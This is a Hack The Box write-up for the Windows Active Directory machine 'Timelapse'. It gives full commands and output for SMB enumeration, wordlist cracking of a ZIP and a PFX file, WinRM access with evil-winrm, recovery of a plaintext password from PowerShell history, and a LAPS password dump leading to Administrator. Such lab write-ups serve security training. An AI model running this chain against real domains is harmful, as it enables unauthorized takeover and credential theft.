Timelapse
8 minutes to read
Hack The Box. Windows. Easy machine. This machine presents an Active Directory (AD) environment where we can find an encrypted ZIP file in SMB. We can crack the password and find a PFX file holding public and private keys for WinRM. Again we can crack the password and extract the keys to connect to the machine. There is a PowerShell history where we find a password for a LAPS reader member, which will tell us the password for Administrator. Basic Windows exploitation techniques and enumeration are needed in order to compromise this machine
- OS: Windows
- Difficulty: Easy
- IP Address: 10.10.11.152
- Release: 26 / 03 / 2022
Port scanning
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.11.152 -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49692,53215
Nmap scan report for 10.10.11.152
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-28 00:13:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-03-28T00:15:13+00:00; +8h18m23s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
53215/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-28T00:14:36
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h18m22s, deviation: 0s, median: 8h18m22s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 100.14 seconds
This machine has ports 53 (DNS), 88 (Kerberos), 135 (MS-RPC), 389 (LDAP), 445 (SMB) and 5986 (WinRM/SSL) open, within others.
$ crackmapexec smb 10.10.11.152
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
Moreover, we see that the machine is a domain controller (DC) from an Active Directory (AD) environment. We can start adding timelapse.htb into /etc/hosts.
SMB enumeration
We can start looking at SMB using a null session:
$ smbclient -L 10.10.11.152 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
We see that there is a share called Shares. We can connect to it and list some folders:
$ smbclient //10.10.11.152/Shares -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 10:39:15 2021
.. D 0 Mon Oct 25 10:39:15 2021
Dev D 0 Mon Oct 25 14:40:06 2021
HelpDesk D 0 Mon Oct 25 10:48:42 2021
6367231 blocks of size 4096. 2285718 blocks available
smb: \> cd Dev
smb: \Dev\> dir
. D 0 Mon Oct 25 14:40:06 2021
.. D 0 Mon Oct 25 14:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 10:46:42 2021
6367231 blocks of size 4096. 2285702 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (8.4 KiloBytes/sec) (average 8.4 KiloBytes/sec)
smb: \Dev\> cd ..\HelpDesk\
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 10:48:42 2021
.. D 0 Mon Oct 25 10:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 09:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 09:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 09:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 09:57:44 2021
6367231 blocks of size 4096. 2285718 blocks available
smb: \HelpDesk\> mget *
Get file LAPS.x64.msi? y
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (545.5 KiloBytes/sec) (average 475.1 KiloBytes/sec)
Get file LAPS_Datasheet.docx? y
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (265.6 KiloBytes/sec) (average 445.1 KiloBytes/sec)
Get file LAPS_OperationsGuide.docx? y
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (654.5 KiloBytes/sec) (average 500.1 KiloBytes/sec)
Get file LAPS_TechnicalSpecification.docx? y
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (176.6 KiloBytes/sec) (average 468.0 KiloBytes/sec)
smb: \HelpDesk\> exit
We have downloaded all these files:
winrm_backup.zipLAPS.x64.msiLAPS_Datasheet.docxLAPS_OperationsGuide.docxLAPS_TechnicalSpecification.docx
Cracking files
The ZIP archive is password-protected:
$ unzip -l winrm_backup.zip
Archive: winrm_backup.zip
Length Date Time Name
--------- ---------- ----- ----
2555 2021-10-25 09:21 legacyy_dev_auth.pfx
--------- -------
2555 1 file
$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
We can use fcrackzip to find the password using a brute force attack:
$ fcrackzip -uDp $WORDLISTS/rockyou.txt winrm_backup.zip
PASSWORD FOUND!!!!: pw == supremelegacy
$ unzip -P supremelegacy winrm_backup.zip
Archive: winrm_backup.zip
inflating: legacyy_dev_auth.pfx
The ZIP file stores a PFX file, which contains a pair of keys to connect to WinRM. Notice that the open port is 5986, not 5985 as usually. That is because it is using SSL and thus we need some private and public keys in order to connect.
We can extract these keys using openssl:
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out priv-key.pem
Enter Import Password:
Can't read Password
But we need another password because supremelegacy does not work.
I found a tool called crackpkcs12 to make a brute force attack:
$ ./crackpkcs12 -d $WORDLISTS/rockyou.txt legacyy_dev_auth.pfx
Dictionary attack - Starting 1 threads
*********************************************************
Dictionary attack - Thread 1 - Password found: thuglegacy
*********************************************************
And we get another password, let’s take the keys:
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out priv-key.pem
Enter Import Password:
MAC verified OK
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pub-key.pem
Enter Import Password:
MAC verified OK
Now we can use evil-winrm to connect to the machine (there is no need to use username/password because they come within the keys):
$ evil-winrm -i 10.10.11.152 --ssl -k priv-key.pem -c pub-key.pem
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\Desktop\user.txt
76a99a6d71f58a99a2844eb3b48334e3
And there we have user.txt flag.
System enumeration
Let’s enumerate some users:
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..\..
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> net user legacyy
User name legacyy
Full Name Legacyy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/23/2021 12:17:10 PM
Password expires Never
Password changeable 10/24/2021 12:17:10 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/28/2022 5:10:20 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Development
The command completed successfully.
*Evil-WinRM* PS C:\Users> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/28/2022 1:16:01 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users> net user TRX
User name TRX
Full Name TRX
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2022 6:43:45 PM
Password expires Never
Password changeable 2/24/2022 6:43:45 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/27/2022 10:29:10 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Domain Admins
The command completed successfully.
We see that svc_deploy belongs to LAPS_Readers and TRX belongs to Domain Admins.
LAPS is the acronym for Local Account Password Solution, which generates secure password for administrators (the Word documents found before provide enough information). If we can access as svc_deploy we will be able to see the password by LAPS.
After some enumeration, we discover that legacyy has a PowerShell history with useful commands:
*Evil-WinRM* PS C:\Users\legacyy\Documents> dir C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
There we have the password for svc_deploy. Now we can execute commands as svc_deploy using script blocks:
*Evil-WinRM* PS C:\Users\legacyy\Documents> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users\legacyy\Documents> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\legacyy\Documents> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
*Evil-WinRM* PS C:\Users\legacyy\Documents> Invoke-Command -ComputerName localhost -Credential $c -Port 5986 -usessl -SessionOption $so -ScriptBlock { whoami }
timelapse\svc_deploy
And even connect to the machine using evil-winrm:
$ evil-winrm -i 10.10.11.152 --ssl -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Privilege escalation
But the most important thing is that we can get the password configured by LAPS using crackmapexec:
$ crackmapexec ldap 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps
LDAP 10.10.11.152 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS 10.10.11.152 389 DC01 [*] Getting LAPS Passwords
LAPS 10.10.11.152 389 DC01 Computer: DC01$ Password: h!0yj-1WI(YlDIz+2Il@w1/(
Now we have access as Administrator:
$ evil-winrm -i 10.10.11.152 --ssl -u Administrator -p 'h!0yj-1WI(YlDIz+2Il@w1/('
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
Cannot find path 'C:\Users\Administrator\Desktop\root.txt' because it does not exist.
At line:1 char:1
+ type ..\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
But where is root.txt? Well, let’s search it:
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem root.txt -Path C:\Users\ -Recurse
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/28/2022 6:16 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\TRX\Desktop\root.txt
1505bebfda29707adf43cf8530421b35